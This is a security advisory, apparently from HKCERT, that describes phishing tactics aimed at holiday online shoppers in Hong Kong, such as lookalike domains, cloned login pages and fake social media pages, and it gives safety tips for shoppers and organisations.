Beware of Phishing Campaigns During Festive Season
The easing of quarantine and social distancing restrictions has enabled the normalisation of economic activities and international travel. Along with the upcoming Christmas and New Year long holidays, people will wish to travel abroad, consume gifts, and decorate for festive celebrations.
Attracted by the discounts on offer as well as convenience, many would choose to do their festive shopping online. However, HKCERT had recently observed a number of phishing attacks targeting online shoppers. Since the threat actors have constantly been updating such attacks to try to maximise the number of their victims, HKCERT has compiled this short piece on hackers’ tactics in online shopping and areas that online shoppers must pay attention in order not to fall into these phishing scams.
Phishing Instant Messages
The recent trend of phishing campaigns began with the sending out of malicious shortened URL links of the phishing sites via instant messaging platforms, including smartphone system built-in and third-party messaging apps. As most of those messaging apps have the functionality of setting up the sender’s name, the malicious threat actors could set up and pretend to be a legitimate brand. Below are some examples of instant messages of phishing campaigns.
Phishing Sites with URLs similar to Legitimate Sites
To trick the targeted users into assuming the phishing sites were legitimate and inputting any information, the threat actors would register domain names similar to the brand's legitimate website. Such an example is shown below, in which whereas the legitimate domain name of Hong Kong Post should be ‘hongkongpost.hk’, the threat actor has hosted the phishing site with the domain name of ‘hongkongpost[.]do’.
Phishing Sites with Replication of Legitimate Sites
Besides having a domain name and URL similar to the structure of a legitimate website, the threat actors have recently been replicating part of the legitimate websites, such as the login pages. Since this technique would reduce the efforts for designing a new web interface of the phishing site, the threat actors usually change the backend of the web page after replicating from the legitimate website to fit their needs. This would make the users harder to verify whether the browsing page was legitimate.
Phishing Page in Social Media Platform
As the public widely uses social media platforms such as Facebook, Instagram, etc., some threat actors would create fake pages on famous social media platforms. Most of them would publish some updates of a discount campaign with an attached URL link directing to the phishing sites. The first image was a Facebook page of HKTVmall created by a threat actor, where the design was similar to the legitimate Facebook social media page of HKTVmall. The second image would be the genuine Facebook page of HKTVmall that is being verified by Facebook with the blue badge.
Tips for Safe Online Shopping
- Don't click on any links or attachments from an unknown sender. Always enter the URL of the online shopping platform directly in your browser or use bookmarks. Be careful with the legitimacy of the links and emails. For example, check for spelling and grammatical errors in the URL, or whether the sender is trustworthy. If the website does not use HTTPS for encryption, please be careful and do not provide sensitive information;
- Change the account password of the online shopping platform regularly. Use different passwords for different accounts to prevent from cascading impact if one of them is compromised;
- Enable multi-factor authentications to enhance account security;
- Place orders or check order status from the official website or mobile app only;
- If you receive a suspicious email or instant message, please verify the details at official channels. Do not provide sensitive information to an unknown sender;
- Check your online payment records regularly for suspicious transactions;
- Verify the social media page of an online shop by using the social media verification badge function (Such as the Blue Badge in Facebook and Instagram);
- Adopt anti-phishing feature in web browsers to help blocking phishing attacks; and
- Use the free search engine “Scameter” of Cyberdefender.hk to identify frauds and online pitfalls through email, URL or IP address, etc.
Tips for Organisations Before and During Holiday
- Prepare and plan for cyber security incident response according to Incident Response Guideline for SMEs;
- Ensure the backup system is working properly and an offline backup has been set up. Refer to HKCERT’s Fight Ransomware page to have more understands about ransomware;
- Leverage the Open Threat Intelligence Campaign to enhance cyber security defence capabilities;
- Build up protection against malicious scan attacks; and
- Adopt Zero Trust architecture in the IT environment.